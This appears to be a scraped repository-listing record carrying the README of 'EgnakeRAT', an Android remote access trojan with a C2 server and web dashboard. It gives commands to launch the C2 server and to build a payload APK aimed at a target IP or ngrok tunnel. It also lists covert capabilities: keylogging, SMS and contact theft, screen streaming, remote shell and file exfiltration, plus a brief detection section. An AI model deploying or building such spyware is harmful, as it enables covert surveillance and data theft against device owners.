[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-81691":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":10,"language":11,"languages":10,"totalLinesOfCode":10,"stars":12,"forks":13,"watchers":14,"openIssues":14,"contributorsCount":15,"subscribersCount":15,"size":15,"stars1d":15,"stars7d":16,"stars30d":17,"stars90d":15,"forks30d":15,"starsTrendScore":15,"compositeScore":18,"rankGlobal":10,"rankLanguage":10,"license":19,"archived":20,"fork":20,"defaultBranch":21,"hasWiki":22,"hasPages":20,"topics":23,"createdAt":10,"pushedAt":10,"updatedAt":41,"readmeContent":42,"aiSummary":43,"trendingCount":15,"starSnapshotCount":15,"syncStatus":44,"lastSyncTime":45,"discoverSource":46},81691,"EgnakeRAT","egnake\u002FEgnakeRAT","egnake","Advanced, asynchronous Android Command & Control (C2) framework featuring AES-256-CBC encryption, DOM-based keylogging, and E2EE notification interception. Built for Red Team operations and mobile security research.","",null,"Java",27,7,1,0,3,4,44.61,"MIT License",false,"main",true,[24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40],"android","flask","hack","hacking","mobile","mobile-app","pentest","pentest-tool","pentesting","pentesting-tools","python","python-script","python3","rat-builder","rat-fud","redteam","websocket","2026-06-12 04:01:34","\u003Cdiv align=\"center\">\n\n```\n ╔══════════════════════════════════════════════════════════════════════════════╗\n ║ ███████╗ ██████╗ ███╗   ██╗ █████╗ ██╗  ██╗███████╗██████╗  █████╗ ████████╗ ║\n ║ ██╔════╝██╔════╝ ████╗  ██║██╔══██╗██║ ██╔╝██╔════╝██╔══██╗██╔══██╗╚══██╔══╝ ║\n ║ █████╗  ██║  ███╗██╔██╗ ██║███████║█████╔╝ █████╗  ██████╔╝███████║   ██║    ║\n ║ ██╔══╝  ██║   ██║██║╚██╗██║██╔══██║██╔═██╗ ██╔══╝  ██╔══██╗██╔══██║   ██║    ║\n ║ ███████╗╚██████╔╝██║ ╚████║██║  ██║██║  ██╗███████╗██║  ██║██║  ██║   ██║    ║\n ║ ╚══════╝ ╚═════╝ ╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝╚═╝  ╚═╝   ╚═╝    ║\n 
╚══════════════════════════════════════════════════════════════════════════════╝\n```\n\n**Advanced Android C2 Framework · AES-256 Encrypted · Real-Time Web Dashboard**\n\n[![Python](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FPython-3.10+-3776AB?style=flat-square&logo=python&logoColor=white)](https:\u002F\u002Fpython.org)\n[![Platform](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FTarget-Android-3DDC84?style=flat-square&logo=android&logoColor=white)](https:\u002F\u002Fdeveloper.android.com)\n[![Encryption](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FCrypto-AES--256--CBC-red?style=flat-square&logo=letsencrypt&logoColor=white)]()\n[![License](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FLicense-Educational-yellow?style=flat-square)]()\n[![Status](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FStatus-Active-success?style=flat-square)]()\n\n\u003C\u002Fdiv>\n\n---\n\n> **⚠️ LEGAL DISCLAIMER — READ BEFORE USE**\n>\n> EgnakeRAT is a **Remote Administration Tool (RAT)** built strictly for **authorized penetration testing**, **red team operations**, and **academic security research**. Deploying this tool on systems or devices **without explicit written consent** from the owner is **illegal** and may violate laws including but not limited to the **Computer Fraud and Abuse Act (CFAA)**, **GDPR**, and equivalent legislation in your jurisdiction.\n>\n> **The author assumes no liability for misuse.** By using this software, you agree that you are solely responsible for compliance with all applicable laws. 
This project is provided as-is for educational purposes only.\n\n---\n\n## Architecture\n\n```\n┌─────────────────────────────────────────────────────────────┐\n│                        EgnakeRAT                            │\n├──────────────────┬──────────────────┬───────────────────────┤\n│   C2 TCP Server  │   Web Dashboard  │   Android Client      │\n│   (asyncio)      │   (Flask+SIO)    │   (Java\u002FKotlin)       │\n├──────────────────┼──────────────────┼───────────────────────┤\n│ StreamReader\u002F    │ REST API         │ Persistent Service    │\n│ StreamWriter     │ Socket.IO WS     │ Accessibility Svc     │\n│ Coroutine-per-   │ Real-time events │ Auto-reconnect        │\n│ connection       │                  │ Stealth mode          │\n├──────────────────┴──────────────────┴───────────────────────┤\n│                    Shared Layer                             │\n│  ┌──────────┐  ┌───────────────┐  ┌───────────────────┐     │\n│  │ Protocol │  │ CryptoManager │  │ Database (SQLite) │     │\n│  │ JSON+LPF │  │ AES-256-CBC   │  │ WAL mode          │     │\n│  └──────────┘  └───────────────┘  └───────────────────┘     │\n└─────────────────────────────────────────────────────────────┘\n```\n\n## Features\n\n### C2 Server\n- **Fully asynchronous** — built on `asyncio.start_server`, handles thousands of concurrent connections with minimal memory\n- **AES-256-CBC encrypted** communications with SHA-256 key derivation\n- **Length-prefixed JSON protocol** — 4-byte big-endian header + encrypted payload, max 50MB per message\n- **Automatic reconnection handling** — stale sessions are cleaned up, old connections gracefully terminated\n- **Ngrok tunnel support** — built-in TCP tunneling for external access\n\n### Web Dashboard\n- **Real-time device management** via Socket.IO WebSocket events\n- **Dark glassmorphism UI** with Lucide icons, Inter\u002FJetBrains Mono typography\n- **Modules:** Tactical commands, Remote shell, Keylogger, Screen stream, Notification 
intercept, File exfiltration, Audit log\n- **Payload generator** — configure and patch Android APK directly from the browser\n- **Global map** — Leaflet.js powered device geolocation tracking\n\n### Android Client Capabilities\n| Category | Commands |\n|---|---|\n| **Reconnaissance** | `deviceInfo`, `getBatteryStatus`, `getWifiInfo`, `getIP`, `getMACAddress`, `getSimDetails`, `getInstalledApps`, `getClipData` |\n| **Surveillance** | `getLocation`, `getSMS`, `getCallLogs`, `getContacts`, `getNotifications` |\n| **Media** | `camList`, `takepic`, `screenshot`, `startAudio\u002FstopAudio`, `startVideo\u002FstopVideo` |\n| **Live Interaction** | `startScreenStream\u002FstopScreenStream`, `makeCall`, `sendSMS`, `openUrl`, `showToast`, `vibrate`, `lockScreen` |\n| **Shell & Files** | `shell`, `shellCmd`, `fileList`, `fileDownload`, `fileUpload`, `fileDelete` |\n| **Accessibility** | `startKeylogger\u002FstopKeylogger`, `readScreen`, `performAction`, `checkAccessibility`, `enableAccessibility` |\n\n### Wire Protocol\n\n```\n┌────────────┬──────────────────────────────────┐\n│ 4 bytes    │ N bytes                          │\n│ Length (BE)│ AES-256-CBC(JSON payload)        │\n└────────────┴──────────────────────────────────┘\n```\n\nEvery message is a JSON object with a `type` field. The payload is encrypted with AES-256-CBC (random IV prepended), then base64-encoded, then length-prefixed with a 4-byte big-endian integer.\n\n**Handshake flow:**\n1. Client connects via TCP\n2. Client sends `handshake` message with `device_id`, `model`, `android_version`, `key_hash`\n3. Server verifies `key_hash` matches `MD5(SHA256(passphrase))`\n4. Server responds with `handshake_ack`\n5. 
Client enters heartbeat loop, server can issue commands at any time\n\n## Setup\n\n### Requirements\n- Python 3.10+\n- Android Studio (for APK building)\n\n### Installation\n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fuser\u002FEgnakeRAT.git\ncd EgnakeRAT\npip install -r requirements.txt\n```\n\n### Start the C2 Server\n\n```bash\n# Default: C2 on port 8000, Dashboard on port 8080\npython EgnakeRAT.py server\n\n# Custom ports\npython EgnakeRAT.py server -p 9000 -w 3000\n\n# With ngrok tunnel (for external access)\npython EgnakeRAT.py server --ngrok\n\n# Custom encryption key\npython EgnakeRAT.py server -k \"YourSecurePassphrase\"\n```\n\nAccess the dashboard at `http:\u002F\u002Flocalhost:8080`\n\n### Build the Android Payload\n\n```bash\n# Configure APK with target IP and port\npython EgnakeRAT.py build -i 192.168.1.100 -p 8000\n\n# With ngrok\npython EgnakeRAT.py build --ngrok\n\n# Custom encryption key\npython EgnakeRAT.py build -i 10.0.0.5 -p 8000 -k \"YourSecurePassphrase\"\n```\n\nThen open `Android_Code\u002F` in Android Studio and run `Build → Generate Signed APK` or:\n```bash\ncd Android_Code && .\u002Fgradlew assembleRelease\n```\n\n## Project Structure\n\n```\nEgnakeRAT\u002F\n├── EgnakeRAT.py              # Entry point (server + build CLI)\n├── requirements.txt\n├── server\u002F\n│   ├── c2_server.py           # Async TCP C2 server + client handler\n│   ├── protocol.py            # Wire protocol constants + pack\u002Funpack\n│   ├── crypto.py              # AES-256-CBC encryption engine\n│   ├── database.py            # SQLite database (WAL mode)\n│   ├── logger.py              # Rich console + file logging\n│   └── web\u002F\n│       ├── app.py             # Flask + Socket.IO web dashboard\n│       ├── static\u002F\n│       │   ├── css\u002Fdashboard.css\n│       │   └── js\u002Fdashboard.js\n│       └── templates\u002F\n│           └── index.html\n├── Android_Code\u002F              # Android client source (Java)\n├── Dumps\u002F            
         # Exfiltrated files (per-device dirs)\n└── logs\u002F                      # Server logs (daily rotation)\n```\n\n## Database Schema\n\n| Table | Purpose |\n|---|---|\n| `devices` | Device registry (model, OS, IP, battery, WiFi, online status) |\n| `command_history` | Full command audit trail with timestamps |\n| `files` | Metadata for exfiltrated files |\n| `sessions` | Connection sessions with connect\u002Fdisconnect timestamps |\n| `keylogs` | Captured keystrokes by application |\n| `notifications` | Intercepted device notifications |\n\n## Defense & Detection\n\nUnderstanding how this tool operates is essential for defensive security:\n\n- **Network indicators** — Persistent TCP connection to a non-standard port with encrypted (non-TLS) traffic\n- **Accessibility service abuse** — Monitor which apps request `BIND_ACCESSIBILITY_SERVICE` permission\n- **Battery drain patterns** — Screen streaming and continuous keylogging increase power consumption\n- **APK analysis** — Hardcoded C2 IP\u002Fport and AES key can be extracted via static analysis of the APK\n\nThis project is released for **educational and authorized security research purposes only**. No warranty is provided. Use at your own risk and responsibility.\n","EgnakeRAT is an advanced asynchronous Android command and control (C2) framework designed for red team operations and mobile security research. Its core features include AES-256-CBC encryption, DOM-based keylogging, and end-to-end encrypted notification interception, which ensure the security and stealth of data transmission. The client is developed in Java and is combined with Python (Flask + Socket.IO) to build a real-time web dashboard, with WebSocket support for efficient communication. It is suited to authorized penetration testing scenarios and helps researchers assess the security of Android devices. Note that use of this software must comply with applicable laws and regulations and is limited to legally authorized security testing activities.",2,"2026-06-11 04:05:59","CREATED_QUERY"]